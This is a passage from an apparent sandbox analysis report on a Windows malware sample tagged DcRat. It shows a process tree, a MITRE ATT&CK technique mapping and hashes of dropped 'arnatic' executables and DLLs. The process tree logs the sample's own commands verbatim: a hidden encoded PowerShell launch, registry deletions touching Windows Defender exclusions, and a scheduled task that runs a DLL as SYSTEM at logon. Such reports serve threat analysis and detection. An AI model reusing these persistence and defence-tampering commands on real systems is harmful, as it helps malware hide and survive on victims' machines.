                                                                                                                                                                                                                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5728
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5636
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe sG /site_id 525403 /S
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1068
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5264
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3692
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5340
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\CbCNPA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3176
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 524 -p 5788 -ip 5788
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1032

                                                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                  Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                  Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1562

                                                                                                                                                                                                                                                                                                                                                                                                                                  File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                  Process Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1057

                                                                                                                                                                                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                  Service Stop

                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                  T1489

                                                                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Documents and Settings\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    53c1dc18657ab07de3c6ae7776b7bf39

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    3ddfe3709a2b299a3e0dba866516734ee4b23275

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    7b21188396d28d8de129de2a44042a4d57b42afcb6fd826628e8b6637b071f89

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    ae2edf1375756add690656f78c60cd0785afa6beea30c8070dd2be6762033ec0f3ed11e4006b11ef3a42b7db75de46cfefba3810f5a7054825dc766dd2b649da

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8zeYyAhCLyy4MXuHDcnSZuq6.exe.log
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    a1f96913c2af719f78eeb8e8ed0e4f05

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    b868e84dae088fd7b3ead66b83a012e54a3568b7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    182673fba144b5cabdf24381bf82d8b1a5379a4a2ab96819db9d367a81cc2acb

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    fa99c1f40d9618ef0c493aaa16dd38a10346ddb0c4ca00e27400ca7ed701f5e05be1c807218459c2c05cce47a35103444c05d824d7a7f5fe8b33fca2bac28a0b

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2783.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    cd7484811f927da2302bb6a1054802cf

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    e19672a18f519e7b67d9bd4ce29f82c503b146ff

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    07c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    cd7484811f927da2302bb6a1054802cf

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    e19672a18f519e7b67d9bd4ce29f82c503b146ff

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    07c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    2106404b9f606ae729006fe497f6ccaa

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    463383c4c6f4a56c317b4dfdb6f8f7a4011b8afc

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    c82be3945c3d7689c2be77e995050ac437ea5786ab0bc128d5e31262096dd353

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    7800b887b84da2e78dd4ab8d9c4cfec65c5af61c8387f30994e7ea8fb0aa69e1d61732b30a00ec7067afc7ffad44ddcdcd29ab4268ba92621b665c58078633f9

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    2106404b9f606ae729006fe497f6ccaa

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    463383c4c6f4a56c317b4dfdb6f8f7a4011b8afc

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    c82be3945c3d7689c2be77e995050ac437ea5786ab0bc128d5e31262096dd353

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    7800b887b84da2e78dd4ab8d9c4cfec65c5af61c8387f30994e7ea8fb0aa69e1d61732b30a00ec7067afc7ffad44ddcdcd29ab4268ba92621b665c58078633f9

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    6c3e0a1c839e28ca5b7c12695bd50c9d

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    f3c2177fabb8dee68cad911a56e221bae930a12f

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    6c3e0a1c839e28ca5b7c12695bd50c9d

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    f3c2177fabb8dee68cad911a56e221bae930a12f

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    bdd81266d64b5a226dd38e4decd8cc2c

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    2395557e0d8fd9bcfe823391a9a7cfe78ee0551a

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    f4031df5e0df4785513fd9fc9843e0aba4623e61b58cd163354ea64f9133b388

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    5013de02342de9e84e27f183e6abb566aec066f0aba3072ff3330bc0183b1f46581fd35f53cd2c8099a89668596541e37dd31b8c03b0cb93d816ce3694f40686

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    bdd81266d64b5a226dd38e4decd8cc2c

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    2395557e0d8fd9bcfe823391a9a7cfe78ee0551a

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    f4031df5e0df4785513fd9fc9843e0aba4623e61b58cd163354ea64f9133b388

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    5013de02342de9e84e27f183e6abb566aec066f0aba3072ff3330bc0183b1f46581fd35f53cd2c8099a89668596541e37dd31b8c03b0cb93d816ce3694f40686

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    5632c0cda7da1c5b57aeffeead5c40b7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    533805ba88fbd008457616ae2c3b585c952d3afe

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    2b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    5632c0cda7da1c5b57aeffeead5c40b7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    533805ba88fbd008457616ae2c3b585c952d3afe

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    2b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    5632c0cda7da1c5b57aeffeead5c40b7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    533805ba88fbd008457616ae2c3b585c952d3afe

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    2b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll
